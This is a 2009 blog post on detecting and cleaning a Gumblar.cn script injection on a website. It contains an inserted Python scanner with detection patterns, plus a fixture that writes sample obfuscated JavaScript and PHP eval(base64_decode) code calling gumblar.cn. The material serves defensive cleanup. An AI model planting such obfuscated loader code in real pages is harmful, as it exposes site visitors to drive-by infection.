Saturday 9 May 2009

How to find and remove a Gumblar.cn injection attack

Gumblar.cn is a website that has been listed as suspicious; it hosts several exploit scripts and trojans that can infect the computers of people who visit a page that loads it. You may have come across it, or noticed that a site is 'connecting to gumblar.cn' in the status bar in the bottom left-hand corner of the Firefox browser. The scary thing is that the vast majority of visitors never spot it. If you regularly scan your server for vulnerabilities and keep tight security you should have noticed it by now, but it's always worth checking.

If your site has been 'injected' with the script, there are several forums currently trying to solve the problem. As yet I haven't come across a solid solution, because the injected script (which hijacks the site) varies both in its actual code and in which pages it lands in. Annoying if you have 6000+ pages, of course : ) . Since the virus obfuscates the script (some characters are replaced with their numeric codes) it's very hard to find, let alone remove!

How to find it:

As the script varies from machine to machine it is tricky to locate, so I will only describe how I discovered the virus on a colleague's website. I first came across a file named image.php stored in the images folder (the file has since been renamed to something else) which contained this code section:

base64_decode( mumbo-jumbo here )

This is the decoder stage: the 'mumbo-jumbo' is the real payload, base64-encoded so that a plain text search for the domain name finds nothing. Whatever it decodes is what ends up contacting the Gumblar website to do, most likely, unpleasant things with your information. Note that base64_decode on its own is perfectly legitimate PHP; what makes this one suspicious is a long opaque blob with no readable purpose, sitting in a .php file that has no business being in an images folder at all.

So I had found the decoder; now all I had to do was locate the main script. After reading a wide selection of posts on the topic (some are listed below) I started searching for different script snippets using Windows Search (words and phrases in the file) and eventually found the one that matched my files:

.replace(/#/g,'%');eval(unescape

...and there it was in the middle of the code: 75mbla, hidden behind the '#' escapes! The snippet above swaps every '#' for '%' and then calls unescape, so '#75' becomes '%75', which unescape turns into the letter 'u' (0x75); 'g#75mbla' therefore reads 'gumbla', and the rest of the domain is hidden the same way. Because the exact characters that get escaped change from infection to infection, search for the replace/eval/unescape pattern rather than for the domain name itself.
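As an added worked example (not from the original post), here is a small Python scanner that automates the search described above: it walks a web root, flags files containing either marker, base64-decodes the PHP blob and undoes the '#'-for-'%' swap so the hidden domain can be read in clear. The directory layout, file names and payload strings it builds for itself are constructed placeholders, not the real injected code; the regular expressions are written for the two patterns quoted in this post and will need widening for variants.

```python
# Added example (not from the original post): a scanner for the two markers the
# post describes -- a base64_decode() blob in a PHP file and the
# ".replace(/#/g,'%');eval(unescape" unpacker in HTML/JS -- that shows what
# each one hides.  Everything written by build_sample_site() is constructed for
# illustration and is NOT the real Gumblar code.
import base64
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Marker 1: base64_decode('<long blob>'), the "decoder" stub found in image.php.
PHP_BASE64_RE = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]{40,})['"]\s*\)""")
# Marker 2: the unpacker the post located with Windows Search.
JS_MARKER = ".replace(/#/g,'%');eval(unescape"
# Double-quoted JavaScript string literals (backslash escapes allowed inside).
DQ_STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
HASH_ESCAPE_RE = re.compile(r"#[0-9A-Fa-f]{2}")


def unhash_escape(s: str) -> str:
    """Undo the obfuscation: '#' stood in for '%', so '#75' is '%75', i.e. 'u'.
    JavaScript's unescape() works on code points, which latin-1 reproduces."""
    return unquote(s.replace("#", "%"), encoding="latin-1")


def scan_file(path: Path) -> list[tuple[str, str]]:
    """Return (marker, decoded_payload) pairs for one file."""
    text = path.read_text(encoding="latin-1")
    findings = []
    for m in PHP_BASE64_RE.finditer(text):
        try:
            payload = base64.b64decode(m.group(1), validate=True).decode("latin-1")
        except ValueError:          # binascii.Error is a ValueError subclass
            payload = "<not valid base64>"
        findings.append(("php-base64", payload))
    if JS_MARKER in text:
        # Decode every double-quoted string that carries '#xx' escapes.
        for m in DQ_STRING_RE.finditer(text):
            if HASH_ESCAPE_RE.search(m.group(1)):
                findings.append(("js-unescape", unhash_escape(m.group(1))))
    return findings


def scan_tree(root: Path, exts=(".php", ".html", ".htm", ".js")) -> dict[str, list]:
    """Walk the web root and collect findings per file (paths relative to root)."""
    results = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in exts:
            found = scan_file(p)
            if found:
                results[p.relative_to(root).as_posix()] = found
    return results


def mentions_gumblar(findings) -> bool:
    """True if any decoded payload names the gumblar domain."""
    return any("gumblar" in payload.lower() for _, payload in findings)


def build_sample_site(root: Path) -> None:
    """Write a constructed three-file site: a clean page, a PHP decoder stub in
    the images folder, and a page carrying '#'-escaped JavaScript.  The payload
    strings are placeholders chosen so the decoded text is easy to recognise."""
    (root / "images").mkdir()
    blob = base64.b64encode(b"$h='gumblar.cn'; /* constructed placeholder */").decode()
    (root / "images" / "image.php").write_text(
        "<?php eval(base64_decode('%s')); ?>" % blob, encoding="latin-1")
    (root / "index.html").write_text(
        '<html><body>Hello<script>var x="l#6Fad(\'http://g#75mblar.cn/\')";'
        "x=x.replace(/#/g,'%');eval(unescape(x));</script></body></html>",
        encoding="latin-1")
    (root / "about.html").write_text("<html><body>Clean page</body></html>",
                                     encoding="latin-1")


def demo() -> dict[str, list]:
    """Build the sample site in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_sample_site(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, found in demo().items():
        flag = "GUMBLAR" if mentions_gumblar(found) else "suspicious"
        print(f"{rel}: {flag}")
        for marker, payload in found:
            print(f"    [{marker}] {payload}")
```

Point scan_tree() at a copy of the web root rather than the live site, and treat every hit as something to read by eye: the base64 regex will also match legitimate code that decodes long strings, so the decoded payload, not the mere presence of base64_decode, is what decides.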

I am not sure how it managed to get in, so to speak. Various posts suggest different things. The best thing to do, it seems, is to:

- Keep a tight ship: scan and check your server regularly, and use strong, unique passwords for FTP and admin accounts that cannot be guessed or brute-forced easily. If the site has already been compromised, change those passwords from a machine you know to be clean, otherwise the attacker may simply come back in.

- Keep user input secure: most sites have some form of user interaction, so make sure that your scripts filter metacharacters from user input.

- Validate users' input to remove harmful code, preferably by allowing only what you expect rather than trying to block what you don't (thanks to deKay for this useful bit of information).

It doesn't seem that this virus is keylogging your machine or collecting data; however, the information is still not 100% solid. Google reports the site as:

"Site is listed as suspicious - visiting this website may harm your computer. [These] [a]ttack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners."

but also states that:

"Over the past 90 days, gumblar.cn did not appear to function as an intermediary for the infection of any sites."

Here are a few tools and websites that are useful for this problem:

Discussions about possible solutions:

Virus-Code Injected in PHP File of website

Great post: 12 Facts about the injected script

Good tools to get you started:
Top 10 Web Vulnerability Scanners

A colleague of mine has used the Acunetix free edition:
Acunetix Security Scanner - Free Edition

Good luck!

2 comments:

henrik said...

Thank you! I spent literally hours and hours trying to find it. I had the same problem as you and I'm very pleased. It's hard because if you're running a commercial site like mine then users' experiences and safety are at risk, so you wouldn't believe how relieved I am to have managed to track down this solution.

Thank you yet again.

H

InnovativeICT.net said...

Hi Henrik,

I'm glad you found the solution to work for your website as well.

Best wishes,

Johannes